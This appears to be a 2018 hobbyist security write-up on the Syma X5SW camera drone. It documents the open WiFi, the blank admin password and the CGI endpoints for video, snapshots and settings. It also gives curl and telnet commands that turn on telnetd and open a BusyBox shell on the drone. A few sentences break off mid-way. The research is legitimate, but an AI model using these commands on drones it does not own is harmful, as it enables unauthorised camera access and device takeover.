Cheap drones such as the Syma X5SW aren’t really designed with security in mind. Anyone can connect to the open WiFi access point that the drone broadcasts, issue requests to the drone’s web server for things like video streaming, setting options, and more.
This drone in particular runs a DHCP server and assigns addresses starting at
192.168.1.100, and the drone has the static IP
192.168.1.1. On port 80, it’s running a boa
0.94.14rc21 web server. It has a statically configured
admin user, with a blank password. For authenticating requests, the user supplies
pwd= get parameters.
As a starting point, I downloaded the APK for the android version of the FPV app. Unzipping the apk, we found the first endpoint for capturing images by running the following command on the app’s dex file:
strings com.tomdxs.symafpv/classes.dex | grep cgi
This yielded a single result:
2http://192.168.1.1:80/snapshot.cgi?user=admin&pwd=, clearly the streaming endpoint we were looking for. Googling this led to much better google results, and gave me access to previous research done on these [and similarly architected] drones, and manufacturers that produce similar cameras:
- http://gw.tnode.com/drone/micro-drone-3-0-camera-api/ Winner!
GET /videostream.cgi- streaming video
GET /snapshot.cgi- take a picture
GET /get_params.cgi- get all camera options
GET /set_params.cgi- set all camera options, including activation of
We can obtain video in most modern web browsers by GET requesting the
We can obtain still images by making a GET request here:
http://192.168.1.1/snapshot.cgi?user=admin&pwd= The images it outputs are relatively low quality. One of the samples we obtained had a size of 640x480, and was 0.307 Megapixels
# To obtain a shell on the device, we run the following `GET` request: $ curl 'http://192.168.1.1/set_params.cgi?telnetd=1&save=1&reboot=1&user=admin&pwd=' # Once it reboots, we telnet into the box with the `admin` user: $ telnet -l admin 192.168.1.1 # If all goes successfully, after a few seconds you'll have a shell! # BusyBox v1.15.2 (2015-07-01 14:40:28 CST) hush - the humble shell
Unfortunately, Unlike the microdrone mentioned in one of the other articles I read, it appears you cannot control the drone via the web interface. The serial ports that it mentions unfortunately don’t exist.
Things to do
- There’s binaries for powering off the drone, shutting down, etc. Do they work while in-flight?
- Search for CGI scripts to possibly find other vulnerabilities
2018-05-31- Initial Revision
Found a typo or technical problem? file an issue!